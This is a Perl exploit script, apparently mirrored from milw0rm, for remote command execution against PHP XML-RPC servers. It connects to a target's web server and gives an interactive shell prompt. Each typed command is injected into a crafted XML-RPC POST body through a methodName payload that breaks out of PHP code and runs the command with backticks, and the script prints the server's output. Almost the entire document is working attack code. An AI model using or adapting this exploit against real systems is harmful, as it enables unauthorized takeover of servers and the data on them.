lilbool/vuln-code-analysis
0
1#-------------------------------------------------------#
2# /| #
3# | | #
4# | | #
5# /\ ________| |___ #
6# / \ \_______ __/ #
7# / \|\_____ | | _ _ _ _ ()___ #
8# / /\ \ ___ \ | |<_> / | | | || \ || | | | #
9# / /__\ \| \ || | _ /__ |_ | | ||_/ || | |_| #
10# / ______ \ | || || | / | | | || \ || | | #
11# / / \ \ | || || | / |_ |_ |_|| \|| | \_| #
12# \_/ |\_/ | || || | ___ _ _ #
13# | | | || /| | | | | ||\/| #
14# \| \||/ \| | |_ |_|| | #
15# | | | || | #
16# | |_ | || | #
17# #
18# Original advisory by http://gulftech.org/ #
19# Exploit coded by dukenn (http://asteam.org) #
20# #
21#-------------------------------------------------------
22
23#!/usr/bin/perl
24
25use IO::Socket;
26
27print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n";
28
29if ($ARGV[0] && $ARGV[1])
30{
31 $host = $ARGV[0];
32 $xml = $ARGV[1];
33 $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterror\n";
34 while (1) {
35 print '['.$host.']# ';
36 $cmd = <STDIN>;
37 chop($cmd);
38 last if ($cmd eq 'exit');
39 $xmldata = "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_\n';echo `".$cmd."`;echo '_end_';exit;/*</name></value></param></params></methodCall>";
40 print $sock "POST ".$xml." HTTP/1.1\n";
41 print $sock "Host: ".$host."\n";
42 print $sock "Content-Type: text/xml\n";
43 print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
44 $good=0;
45 while ($ans = <$sock>)
46 {
47 if ($good == 1) { print "$ans"; }
48 last if ($ans =~ /^_end_/);
49 if ($ans =~ /^_begin_/) { $good = 1; }
50 }
51 if ($good==0) {print "Exploit Failed\n";exit();}
52 }
53 }
54else {
55 print "Usage: perl xml.pl [host] [path_to_xmlrpc]\n\n";
56 print "Example: perl xml.pl target.com /script/xmlrpc.php\n";
57exit;
58}
59
60# milw0rm.com [2005-07-04]